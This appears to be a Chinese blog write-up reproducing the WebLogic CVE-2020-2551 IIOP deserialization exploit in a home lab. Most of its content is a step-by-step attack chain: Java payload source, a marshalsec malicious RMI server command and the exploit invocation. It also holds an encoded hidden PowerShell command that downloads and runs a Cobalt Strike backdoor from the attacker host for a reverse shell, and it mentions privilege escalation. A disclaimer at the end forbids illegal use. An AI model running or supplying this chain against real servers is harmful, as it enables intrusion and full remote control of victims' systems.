Weblogic CVE-2020-2551漏洞復現
Weblogic IIOP 反序列化
漏洞原理
https://www.anquanke.com/post/id/199227#h3-7
https://www.cnblogs.com/tr1ple/p/12483235.html
漏洞復現
csdn-Weblogic CVE-2020-2551復現
靶機:windows7系統 IP地址:192.168.43.20
攻擊機:windows10系統 IP地址:192.168.43.38
- 工具
exp.java
marshalsec-0.0.3-SNAPSHOT-all.jar
weblogic_CVE_2020_2551.jar
- exp.java源代碼
import java.io.IOException;
public class exp {
static{
try {
java.lang.Runtime.getRuntime().exec(new String[]{"cmd","/c","calc"});
} catch (IOException e) {
e.printStackTrace();
}
}
public static void main(String[] args) {
}
}
- 1、在exp.java中修改執行的命令,編譯生成exp.class
javac exp.java -source 1.6 -target 1.6
- 2、用python啟動一個web服務,需要與exp.class在同一文件夾
python -m SimpleHTTPServer 80
python3 -m http.server 80
- 3、使用marshalsec起一個惡意的RMI服務
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.43.38/#exp" 1099
- 4、利用漏洞攻擊使目標彈出計算器
java -jar weblogic_CVE_2020_2551.jar 192.168.43.20 7001 rmi://192.168.43.38:1099/exp
//java -jar weblogic_CVE_2020_2551.jar 靶機IP地址 靶機端口 RMI服務
Cobalt strike工具實戰利用
反彈sehll
1、啟動cs團隊服務器、客戶端,生成powershell運行后門命令
- 2、修改powershell
Runtime.getRuntime().exec()函數解決
詳情見Apache Shiro 反序列化漏洞復現(CVE-2016-4437)
- 3、編寫exp.class腳本
import java.io.IOException;
public class exp {
static{
try {
java.lang.Runtime.getRuntime().exec(new String[]{"cmd","/c","powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAIgBJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgA0ADMALgAxADMAOAA6ADgAMAAvAGEAJwApACkAIgA="});
} catch (IOException e) {
e.printStackTrace();
}
}
public static void main(String[] args) {
}
}
- 4、利用weblogic CVE-2020-2551漏洞反彈shell
rundll32.exe提權
- 1、遇到創建用戶失敗,利用rundll32.exe進行用戶提權
- 2、用戶創建成功
參考鏈接
聲明
嚴禁讀者利用以上介紹知識點對網站進行非法操作 , 本文僅用於技術交流和學習 , 如果您利用文章中介紹的知識對他人造成損失 , 后果由您自行承擔 , 如果您不能同意該約定 , 請您務必不要閱讀該文章 , 感謝您的配合 !